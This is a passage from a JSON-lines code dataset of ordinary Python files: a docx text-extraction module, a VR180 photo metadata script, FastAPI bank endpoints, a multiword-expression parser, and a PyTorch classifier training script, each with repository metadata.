"usage_type": "name"}, {"api_name": "os.path.join", "line_number": 477, "usage_type": "call"}, {"api_name": "os.path", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 477, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 482, "usage_type": "name"}, {"api_name": "modules.args.parse_args", "line_number": 482, "usage_type": "call"}, {"api_name": "modules.args", "line_number": 483, "usage_type": "argument"}]} +{"seq_id": "31144676018", "text": "#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\"\"\"Output format for extracted docx content.\n\n:author: Shay Hill\n:created: 7/5/2019\n\nHolds runs in a 5-deep nested list (paragraphs are lists of text runs [strings])::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n [ # paragraph\n \"run 1 \", # text run\n \"run 2 \", # text run\n \"run 3\" # text run\n ]\n ]\n ]\n ]\n ]\n\n_runs properties (e.g., ``header_runs``) return text in this format.\n\nAlso returns a 4-deep nested list (paragraphs are strings)::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n \"run 1 run 2 run 3\" # paragraph\n ]\n ]\n ]\n ]\n\nThis is the format for default (no trailing \"_runs\", e.g ``header``) properties.\n\n\"\"\"\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, Optional\nfrom warnings import warn\n\nfrom .docx_context import collect_docProps\nfrom .docx_reader import DocxReader\nfrom .docx_text import TablesList\nfrom .iterators import enum_at_depth, get_html_map, iter_at_depth\n\n\n@dataclass\nclass DocxContent:\n \"\"\"Holds return values for docx content.\"\"\"\n\n docx_reader: DocxReader\n docx2python_kwargs: Dict[str, Any]\n\n def __getattr__(self, item) -> Any:\n \"\"\"\n Create depth-four paragraph tables form depth-five run tables.\n\n :param item:\n :return:\n\n Docx2Python v1 joined runs into paragraphs earlier in the code. Docx2Python v2\n exposes runs to the user, but still returns paragraphs by default.\n \"\"\"\n if item in {\"header\", \"footer\", \"body\", \"footnotes\", \"endnotes\"}:\n runs = deepcopy(getattr(self, item + \"_runs\"))\n for (i, j, k, l), paragraph in enum_at_depth(runs, 4):\n runs[i][j][k][l] = \"\".join(paragraph)\n return runs\n raise AttributeError(f\"no attribute {item}\")\n\n def _get_runs(self, type_: str) -> TablesList:\n content = []\n for file in self.docx_reader.files_of_type(type_):\n content += file.content\n return content\n\n @property\n def header_runs(self) -> TablesList:\n return self._get_runs(\"header\")\n\n @property\n def footer_runs(self) -> TablesList:\n return self._get_runs(\"footer\")\n\n @property\n def officeDocument_runs(self) -> TablesList:\n return self._get_runs(\"officeDocument\")\n\n @property\n def body_runs(self) -> TablesList:\n return self.officeDocument_runs\n\n @property\n def footnotes_runs(self) -> TablesList:\n return self._get_runs(\"footnotes\")\n\n @property\n def endnotes_runs(self) -> TablesList:\n return self._get_runs(\"endnotes\")\n\n @property\n def images(self) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(\n self.docx2python_kwargs[\"image_folder\"]\n )\n\n @property\n def document(self) -> TablesList:\n \"\"\"All docx \"tables\" concatenated.\"\"\"\n return self.header + self.body + self.footer + self.footnotes + self.endnotes\n\n @property\n def document_runs(self) -> TablesList:\n \"\"\"All docx x_runs properties concatenated.\"\"\"\n return (\n self.header_runs\n + self.body_runs\n + self.footer_runs\n + self.footnotes_runs\n + self.endnotes_runs\n )\n\n @property\n def text(self) -> str:\n \"\"\"All docx paragraphs, \"\\n\\n\" delimited.\"\"\"\n if self.docx2python_kwargs[\"paragraph_styles\"] is True:\n # Paragraph descriptors have been inserted as the first run of each\n # paragraph. Take them out.\n pars = [\"\".join(x[1:]) for x in iter_at_depth(self.document_runs, 4)]\n return \"\\n\\n\".join(pars)\n return \"\\n\\n\".join(iter_at_depth(self.document, 4))\n\n @property\n def html_map(self) -> str:\n \"\"\"A visual mapping of docx content.\"\"\"\n return get_html_map(self.document)\n\n @property\n def properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n warn(\n \"DocxContent.properties is deprecated and will be removed in some future \"\n \"version. Use DocxContent.core_properties.\",\n FutureWarning,\n )\n return self.core_properties\n\n # noinspection PyPep8Naming\n @property\n def core_properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n try:\n docProps = next(iter(self.docx_reader.files_of_type(\"core-properties\")))\n return collect_docProps(docProps.root_element)\n except StopIteration:\n warn(\n \"Could not find core-properties file (should be in docProps/core.xml) \"\n \"in DOCX, so returning an empty core_properties dictionary. Docx files \"\n \"created in Google Docs do not have a core-properties file, so this \"\n \"may be expected.\"\n )\n return {}\n\n def save_images(self, image_folder: str) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(image_folder)\n", "repo_name": "Saransh-13/Test_sum", "sub_path": "venv/Lib/site-packages/docx2python/docx_output.py", "file_name": "docx_output.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "docx_reader.DocxReader", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 57, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 70, "usage_type": "call"}, {"api_name": "iterators.enum_at_depth", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 76, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 83, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 87, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 91, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 95, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 99, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 113, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 118, "usage_type": "name"}, {"api_name": "iterators.iter_at_depth", "line_number": 134, "usage_type": "call"}, {"api_name": "iterators.iter_at_depth", "line_number": 136, "usage_type": "call"}, {"api_name": "iterators.get_html_map", "line_number": 141, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 150, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 144, "usage_type": "name"}, {"api_name": "docx_context.collect_docProps", "line_number": 167, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 177, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "10528575245", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport shutil\nimport base64\nfrom libxmp import XMPFiles, XMPMeta\n\n# Usage\nif len(sys.argv) < 5:\n print('[Usage]')\n print(' $ python {0} [Left image path] [Right image path] [Image width] [Image height]'.format(sys.argv[0]))\n print(' * The image type must be jpeg.')\n print(' * These images must be same width and height.')\n print(' * Output merged vr image file named {Left image file}.vr.jpg.')\n exit()\n\n# Arguments\nlimage_path = sys.argv[1]\nrimage_path = sys.argv[2]\nimage_width = int(sys.argv[3])\nimage_height = int(sys.argv[4])\nif not os.path.isfile(limage_path):\n print('Left image path ({0}) is not exists.'.format(limage_path))\n exit()\nif not os.path.isfile(rimage_path):\n print('Right image path ({0}) is not exists.'.format(rimage_path))\n exit()\n\n# Copy left image file\nlimage_dir = os.path.split(limage_path)[0]\nlimage_fname = os.path.splitext(os.path.split(limage_path)[1])[0]\nvrimage_path = os.path.join(limage_dir, limage_fname + '.vr.jpg')\nshutil.copyfile(limage_path, vrimage_path)\n\n# Load image's xmp\nvrimage_file = XMPFiles(file_path=vrimage_path, open_forupdate=True)\nlxmp = vrimage_file.get_xmp()\n#print(lxmp)\n\n# Google's namespace\nXMP_GIMAGE = 'http://ns.google.com/photos/1.0/image/'\nXMP_GPANO = 'http://ns.google.com/photos/1.0/panorama/'\nXMPMeta.register_namespace(XMP_GIMAGE, 'GImage')\nXMPMeta.register_namespace(XMP_GPANO, 'GPano')\n\n# Set GPano properties\nlxmp.set_property(XMP_GPANO, 'ProjectionType', 'equirectangular')\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaLeftPixels', image_width/2)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaTopPixels', 0)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageWidthPixels', image_width)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoWidthPixels', image_width*2)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'InitialViewHeadingDegrees', 180)\n\n# Encode right image to BASE64\nrimage_data = open(rimage_path, 'rt').read()\nrimage_base64 = base64.b64encode(rimage_data)\n\n# Set GImage properties\nlxmp.set_property(XMP_GIMAGE, 'Mime', 'image/jpeg')\nlxmp.set_property(XMP_GIMAGE, 'Data', rimage_base64)\n\n# Put XMP.\nif vrimage_file.can_put_xmp(lxmp):\n vrimage_file.put_xmp(lxmp)\n print(vrimage_file.get_xmp())\n print(\"Done!\")\n\nvrimage_file.close_file()\n", "repo_name": "temoki/make_vr180photo_py", "sub_path": "make_vr180photo.py", "file_name": "make_vr180photo.py", "file_ext": "py", "file_size_in_byte": 2435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 33, "usage_type": "call"}, {"api_name": "libxmp.XMPFiles", "line_number": 36, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 43, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 43, "usage_type": "name"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 44, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 44, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "16776006048", "text": "from typing import List, Optional\n\nfrom fastapi import APIRouter, Depends, Query\nfrom fastapi.responses import JSONResponse\n\nfrom app.api.errors import BANK_NOT_FOUND\nfrom app.dependencies.services import get_bank_service\nfrom app.models.banks import Bank\nfrom app.models.currencies import Currency\nfrom app.services.banks import Banks\nfrom app.utils.exceptions import BankNotFound\nfrom loguru import logger\n\nrouter = APIRouter(tags=[\"banks\"], prefix=\"/banks\")\n\n\n@router.get(\n path=\"/all\",\n description=\"Метод получения списка всех банков\",\n response_model=List[Bank]\n)\nasync def get_banks(\n currency_id: Optional[int] = Query(default=None),\n banks_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_banks\")\n result = await banks_service.get_banks(currency_id)\n logger.info(\"Method get_banks return \" + result)\n logger.info(\"Finish method get_banks\")\n return result or JSONResponse({})\n\n\n@router.get(\n path=\"/{bank_id}\",\n description=\"Метод получения банка по id\",\n response_model=Bank\n)\nasync def get_bank_by_id(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_by_id\")\n result = await bank_service.get_bank_by_id(bank_id)\n if result:\n logger.info(\"Method get_bank_by_id return \" + result)\n else:\n logger.error(f\"Method get_bank_by_id except {BANK_NOT_FOUND}\")\n return result or JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n\n\n@router.get(\n path=\"/{bank_id}/currencies\",\n description=\"Метод дял получения валют банка\",\n response_model=List[Currency]\n)\nasync def get_bank_currencies(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_currencies\")\n try:\n result = await bank_service.get_bank_currencies(bank_id)\n logger.info(\"Method get_bank_currencies return \" + result)\n return result\n except BankNotFound:\n logger.error(f\"Method get_bank_currencies except {BANK_NOT_FOUND}\")\n return JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n", "repo_name": "Racers-Squad/Ficha-Backend", "sub_path": "app/api/routes/bank.py", "file_name": "bank.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 24, "usage_type": "name"}, {"api_name": "fastapi.Query", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 24, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 24, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 26, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 26, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 28, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 28, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 29, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 20, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 40, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 40, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 40, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 42, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 42, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 45, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 45, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 47, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 48, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 36, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 58, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 58, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 58, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 60, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 60, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 63, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 63, "usage_type": "name"}, {"api_name": "app.utils.exceptions.BankNotFound", "line_number": 65, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 66, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.currencies.Currency", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "72561785767", "text": "import itertools\nimport threading\nfrom abc import ABC, abstractmethod\nfrom functools import lru_cache\nfrom typing import List, Tuple, Dict, Optional\nfrom fnmatch import fnmatch\n\nimport tokenizations\n\nfrom i18n import Language\nfrom models import Mwe\n\n\nclass Parsed:\n def __init__(self, language: Language, text: str, tokens: List[str],\n token_positions: List[Tuple[int, int]],\n lemmas: List[str]):\n self.language = language\n self.text = text\n self.tokens = tokens\n self.token_positions = token_positions\n self.lemmas = lemmas\n\n def contains_mwe(self, mwe: Mwe) -> bool:\n return self.contains_mwe_with_lemmas(mwe.lemmas)\n\n def contains_mwe_with_lemmas(self, lemmas: List[str]) -> bool:\n all_lemmas_exist = True\n\n for lemma in lemmas:\n this_lemma_exists = False\n for possible_lemma in lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n if any([fnmatch(parsed_lemma, possible_lemma) for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n elif any([fnmatch(parsed_token, possible_lemma) for parsed_token in self.tokens]):\n this_lemma_exists = True\n else:\n if any([parsed_lemma == possible_lemma for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n all_lemmas_exist = all_lemmas_exist and this_lemma_exists\n\n return all_lemmas_exist\n\n def get_mwe_indices(self, mwe: Mwe) -> Tuple:\n if not self.contains_mwe(mwe):\n raise AssertionError(\"Mwe should be in parsed sentence.\")\n\n mwe_lemma_positions: Dict[str, List[int]] = dict()\n for ix_tm, mwe_lemma in enumerate(mwe.lemmas):\n mwe_lemma_positions[mwe_lemma] = []\n for possible_lemma in mwe_lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n for ix, lemma in enumerate(self.lemmas):\n if fnmatch(lemma, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n for ix, token in enumerate(self.tokens):\n if fnmatch(token, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n else:\n for ix, lemma in enumerate(self.lemmas):\n if lemma == possible_lemma:\n mwe_lemma_positions[mwe_lemma].append(ix)\n\n mwe_instances = list(itertools.product(*[x for x in mwe_lemma_positions.values()]))\n mwe_instances_sorted = sorted(mwe_instances, key=lambda x: max(x) - min(x))\n return mwe_instances_sorted[0]\n\n def get_mwe_tokens(self, mwe: Mwe) -> List[str]:\n mwe_indices = self.get_mwe_indices(mwe)\n return [self.tokens[x] for x in mwe_indices]\n\n\nclass Parser(ABC):\n def __init__(self):\n self.parser_lock = threading.Lock()\n self.language = None\n\n @abstractmethod\n def get_sentence_count(self, text: str):\n pass\n\n @abstractmethod\n def lemmatize(self, text: str, mwe: Optional[Mwe] = None) -> Tuple[List[str], List[str]]:\n pass\n\n @lru_cache(maxsize=None)\n def parse(self, text: str, mwe: Mwe = None) -> Parsed:\n with self.parser_lock:\n tokens, lemmas = self.lemmatize(text, mwe)\n # print(\"Language:\", self.language)\n # print(\"Tokens:\", tokens)\n # print(\"Lemmas:\", lemmas)\n token_positions = tokenizations.get_original_spans(tokens, text)\n return Parsed(self.language, text, tokens, token_positions, lemmas)\n", "repo_name": "Dodiom/dodiom", "sub_path": "src/nlp/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "i18n.Language", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 34, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Mwe", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 55, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 58, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 65, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 45, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 69, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 74, "usage_type": "name"}, {"api_name": "threading.Lock", "line_number": 76, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 84, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 88, "usage_type": "name"}, {"api_name": "tokenizations.get_original_spans", "line_number": 94, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "40301737406", "text": "#!/usr/bin/env python3\n\"\"\"Train a classifier to classify images as backgroud or targets.\"\"\"\n\nimport argparse\nimport datetime\nimport pathlib\nfrom typing import Tuple\nimport tarfile\nimport shutil\nimport yaml\n\nimport torch\n\nfrom train import datasets\nfrom train.train_utils import utils, swa\nfrom core import classifier\nfrom data_generation import generate_config\n\n_LOG_INTERVAL = 50\n_SAVE_DIR = pathlib.Path(\"~/runs/uav-clf\").expanduser()\n\n\ndef train(model_cfg: dict, train_cfg: dict, save_dir: pathlib.Path = None) -> None:\n\n # TODO(alex) these paths should be in the generate config\n train_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_train\")\n eval_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_val\")\n\n use_cuda = torch.cuda.is_available()\n\n highest_score = {\"base\": 0, \"swa\": 0}\n\n clf_model = classifier.Classifier(\n backbone=model_cfg.get(\"backbone\", None),\n img_width=generate_config.PRECLF_SIZE[0],\n img_height=generate_config.PRECLF_SIZE[0],\n num_classes=2,\n )\n print(\"Model: \\n\", clf_model)\n\n if use_cuda:\n torch.backends.cudnn.benchmark = True\n clf_model.cuda()\n\n optimizer = create_optimizer(train_cfg[\"optimizer\"], clf_model)\n lr_params = train_cfg[\"lr_scheduler\"]\n\n epochs = train_cfg.get(\"epochs\", 0)\n assert epochs > 0, \"Please supply epoch > 0\"\n\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n float(lr_params.get(\"max_lr\", 1e-2)),\n total_steps=len(train_loader) * epochs,\n pct_start=float(lr_params.get(\"warmup_fraction\", 0.1)),\n div_factor=float(lr_params[\"max_lr\"]) / float(lr_params[\"start_lr\"]),\n final_div_factor=float(lr_params[\"start_lr\"]) / float(lr_params[\"end_lr\"]),\n )\n\n loss_fn = torch.nn.CrossEntropyLoss()\n global_step = 0\n\n for epoch in range(epochs):\n all_losses = []\n\n for idx, (data, labels) in enumerate(train_loader):\n optimizer.zero_grad()\n global_step += 1\n\n if use_cuda:\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n losses = loss_fn(out, labels)\n all_losses.append(losses.item())\n\n # Compute the gradient throughout the model graph\n losses.backward()\n optimizer.step()\n lr_scheduler.step()\n\n if idx % _LOG_INTERVAL == 0:\n lr = optimizer.param_groups[0][\"lr\"]\n print(\n f\"Epoch: {epoch} step {idx}, loss {sum(all_losses) / len(all_losses):.5}. lr: {lr:.4}\"\n )\n\n # Call evaluation function\n clf_model.eval()\n highest_score = eval_acc = eval(\n clf_model, eval_loader, use_cuda, highest_score, save_dir,\n )\n clf_model.train()\n\n print(\n f\"Epoch: {epoch}, Training loss {sum(all_losses) / len(all_losses):.5} \\n\"\n f\"Base accuracy: {eval_acc['base']:.4} \\n\"\n )\n\n\ndef eval(\n clf_model: torch.nn.Module,\n eval_loader: torch.utils.data.DataLoader,\n use_cuda: bool = False,\n previous_best: dict = None,\n save_dir: pathlib.Path = None,\n) -> float:\n \"\"\" Evalulate the model against the evaulation set. Save the best \n weights if specified. \"\"\"\n num_correct, total_num = 0, 0\n\n with torch.no_grad():\n for data, labels in eval_loader:\n\n if torch.cuda.is_available():\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n _, predicted = torch.max(out.data, 1)\n\n num_correct += (predicted == labels).sum().item()\n total_num += data.shape[0]\n\n accuracy = {\n \"base\": num_correct / total_num,\n }\n\n if accuracy[\"base\"] > previous_best[\"base\"]:\n print(f\"Saving model with accuracy {accuracy}.\")\n\n # Delete the previous best\n utils.save_model(clf_model, save_dir / \"classifier.pt\")\n\n return accuracy\n else:\n return previous_best\n\n\ndef create_data_loader(\n train_cfg: dict, data_dir: pathlib.Path,\n) -> Tuple[torch.utils.data.DataLoader, torch.utils.data.DataLoader]:\n batch_size = train_cfg.get(\"batch_size\", 64)\n\n assert data_dir.is_dir(), data_dir\n\n dataset = datasets.ClfDataset(data_dir, img_ext=generate_config.IMAGE_EXT,)\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, pin_memory=True, shuffle=True\n )\n return loader\n\n\ndef create_optimizer(optim_cfg: dict, model: torch.nn.Module) -> torch.optim.Optimizer:\n \"\"\" Take in optimizer config and create the optimizer for training. \"\"\"\n name = optim_cfg.get(\"type\", None)\n if name.lower() == \"sgd\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=lr,\n momentum=momentum,\n weight_decay=weight_decay,\n nesterov=True,\n )\n elif name.lower() == \"rmsprop\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.RMSprop(\n model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay\n )\n else:\n raise ValueError(f\"Improper optimizer supplied {name}.\")\n\n return optimizer\n\n\nif __name__ == \"__main__\":\n torch.random.manual_seed(42)\n\n if torch.cuda.is_available():\n torch.cuda.random.manual_seed(42)\n\n parser = argparse.ArgumentParser(\n description=\"Trainer code for classifcation models.\"\n )\n parser.add_argument(\n \"--model_config\",\n required=True,\n type=pathlib.Path,\n help=\"Path to yaml model definition.\",\n )\n args = parser.parse_args()\n\n config_path = args.model_config.expanduser()\n assert config_path.is_file(), f\"Can't find {config_path}.\"\n\n # Load the model config\n config = yaml.safe_load(config_path.read_text())\n\n model_cfg = config[\"model\"]\n train_cfg = config[\"training\"]\n\n # Copy in this config file to the save dir. The config file will be used to load the\n # saved model.\n save_dir = _SAVE_DIR / (\n datetime.datetime.now().isoformat().split(\".\")[0].replace(\":\", \".\")\n )\n save_dir.mkdir(parents=True)\n shutil.copy(config_path, save_dir / \"config.yaml\")\n\n train(model_cfg, train_cfg, save_dir)\n\n # Create tar archive if best weights are saved.\n with tarfile.open(save_dir / \"classifier.tar.gz\", mode=\"w:gz\") as tar:\n for model_file in save_dir.glob(\"*\"):\n tar.add(model_file, arcname=model_file.name)\n print(f\"Saved model to {save_dir / 'classifier.tar.gz'}\")\n", "repo_name": "alexwitt23/uav-austin", "sub_path": "train/train_clf.py", "file_name": "train_clf.py", "file_ext": "py", "file_size_in_byte": 6834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 26, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 26, "usage_type": "name"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "core.classifier.Classifier", "line_number": 33, "usage_type": "call"}, {"api_name": "core.classifier", "line_number": 33, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 35, "usage_type": "name"}, {"api_name": 